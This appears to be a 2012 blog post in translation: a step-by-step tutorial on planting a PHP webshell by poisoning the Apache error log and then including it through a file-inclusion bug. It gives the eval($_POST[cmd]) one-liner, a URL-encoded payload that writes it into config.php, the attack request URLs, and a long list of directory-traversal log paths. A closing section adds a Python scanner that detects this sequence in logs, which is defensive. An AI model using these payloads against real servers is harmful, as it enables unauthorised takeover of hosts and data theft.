
Writing a webshell via PHP inclusion of the Apache log

Posted on 2012-9-15 14:27:40
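The method above is not very practical: in my testing I found that the logs easily run to tens of megabytes, which takes all the fun out of it. So let's take the idea one step further and write a practical webshell to use instead, which is also far better than the painfully slow approach above.
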
For example, take the same one-line trojan again:
<?eval($_POST[cmd]);?>

By now you have probably realised that this is a pretty good approach. Next, the question becomes how to write it. Use this:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, and then the one-line trojan server-side statement <?eval($_POST[cmd]);?> is written into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>   // writes the one-line trojan statement into config.php

We submit this statement, let Apache record it in the error log, and then include the log, which writes the shell. Remember that it must be converted to URL-encoded form for this to work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log now contains this line of code that writes the webshell.
Then we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell is now written successfully: the one-line trojan statement has been written into config.php.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client, and the host is yours.

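PS: Everything above assumes the folder permissions are writable; they must be -rwxrwxrwx (777) to go on, and here you can check directly using the directory listing shown above. Everything above is exploitation in the case where the log path is known.

For other log paths, you can guess, or refer to this list.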
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
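A defender's view of the two requests described in this post, as an added example that is not part of the original post: a Python scanner that flags PHP open tags recorded in Apache logs and request parameters that name a log file. The sample lines, the /home/site path and the harmless marker code are constructed; z.php and zizzy are the names used in the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# "<?" followed by something code-like: <?php, <?=, or a short tag such as <?$fp / <?eval
PHP_TAG = re.compile(r"<\?(php|=|[\s$a-z_(])", re.I)
# A parameter value that names a web-server log file (error_log, access.log, www-error_log ...)
LOG_REF = re.compile(r"(^|/)[\w.-]*(access|error)[._]log\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(text, rounds=3):
    """Percent-decode repeatedly so nested encoding is normalised too."""
    for _ in range(rounds):
        once = unquote(text)
        if once == text:
            break
        text = once
    return text

def classify(line):
    """Return the findings for one access-log or error-log line."""
    findings = set()
    # The whole line is checked, so a tag in the path, Referer or User-Agent all count.
    if PHP_TAG.search(decode(line)):
        findings.add("php-tag-in-log")
    request = REQUEST.search(line)
    if request:
        query = urlsplit(request.group(1)).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_REF.search(decode(value)):
                findings.add("log-path-in-parameter")
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every flagged line."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, sorted(found)) for n, found in hits if found]

# Constructed sample lines: addresses, paths and the harmless "marker" code are made up.
SAMPLE = [
    '203.0.113.7 - - [15/Sep/2012:14:20:01 +0800] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Sep/2012:14:21:10 +0800] "GET /%3C%3Fecho%28%22marker%22%29%3B%3F%3E HTTP/1.1" 404 209',
    '[Sat Sep 15 14:21:10 2012] [error] [client 203.0.113.7] File does not exist: /var/www/html/<?echo("marker");?>',
    '203.0.113.7 - - [15/Sep/2012:14:22:30 +0800] "GET /z.php?zizzy=/home/site/logs/www-error_log HTTP/1.1" 200 88',
    '203.0.113.7 - - [15/Sep/2012:14:22:31 +0800] "GET /z.php?zizzy=..%2F..%2Fvar%2Flog%2Fhttpd%2Faccess_log HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE):
        print(number, ", ".join(found))
```

A hit on both rules from the same client within a short window matches the sequence the post describes: first the tag is logged, then the log is passed to an include parameter.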